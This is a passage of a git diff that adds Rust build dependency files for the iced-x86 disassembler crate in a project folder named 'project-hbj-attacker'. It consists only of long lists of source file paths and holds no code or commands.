/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt_opts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/pseudo_ops.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl_ls.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/string_output.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/symres.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_constants.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_features.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/cpuid_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/factory.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/info_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/rflags_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_create.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_memory_sizes.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_op_counts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/memory_size.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonic.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonics.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/register.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/tuple_type_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/../README.md
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/block.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/call_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/ip_relmem_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/jcc_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/jmp_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/simple_br_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/simple_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/xbegin_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/asm_traits.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/code_asm_methods.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/fn_asm_impl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/fn_asm_pub.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/mem.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/op_state.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/reg.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/registers.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/constant_offsets.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/data_reader.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/d3now.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/evex.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/fpu.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/legacy.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/tables.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/vex.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_evex.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_legacy.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_vex.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_xop.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/evex_reader.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/legacy_reader.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/vex_reader.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/encoder_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/handlers_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/instruction_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mem_op.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mnemonic_str_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_handler.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_kind_tables.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops_tables.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums_shared.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/options.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/pseudo_ops_fast.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/regs.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options_fast_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_consts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_opt_provider.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_opts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_utils.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_utils_all.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/regs.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/regs.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt_opts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/pseudo_ops.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl_ls.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/string_output.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/symres.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_constants.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_error.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_features.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/cpuid_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/factory.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/info_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/rflags_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_create.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_internal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_memory_sizes.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_op_counts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/memory_size.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonic.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonics.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/register.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/tuple_type_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/../README.md:
diff --git a/01/project-hbj-attacker/target/debug/deps/iced_x86-a996d80c3efd4f81.d b/01/project-hbj-attacker/target/debug/deps/iced_x86-a996d80c3efd4f81.d
new file mode 100644
index 0000000..f162b35
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/iced_x86-a996d80c3efd4f81.d
@@ -0,0 +1,135 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/iced_x86-a996d80c3efd4f81.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/block.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/call_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/ip_relmem_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/jcc_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/jmp_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/simple_br_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/simple_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/xbegin_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/asm_traits.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/code_asm_methods.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/fn_asm_impl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/fn_asm_pub.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/mem.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/op_state.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/reg.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code_asm/registers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/constant_offsets.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/data_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/d3now.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/evex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/fpu.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/legacy.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/tables.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/vex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_evex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_legacy.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_vex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_xop.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/evex_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/legacy_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/vex_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/encoder_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/handlers_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/instruction_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mem_op.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mnemonic_str_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_handler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_kind_tables.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops_tables.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums_shared.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/options.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/pseudo_ops_fast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/regs.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options_fast_fmt.rs 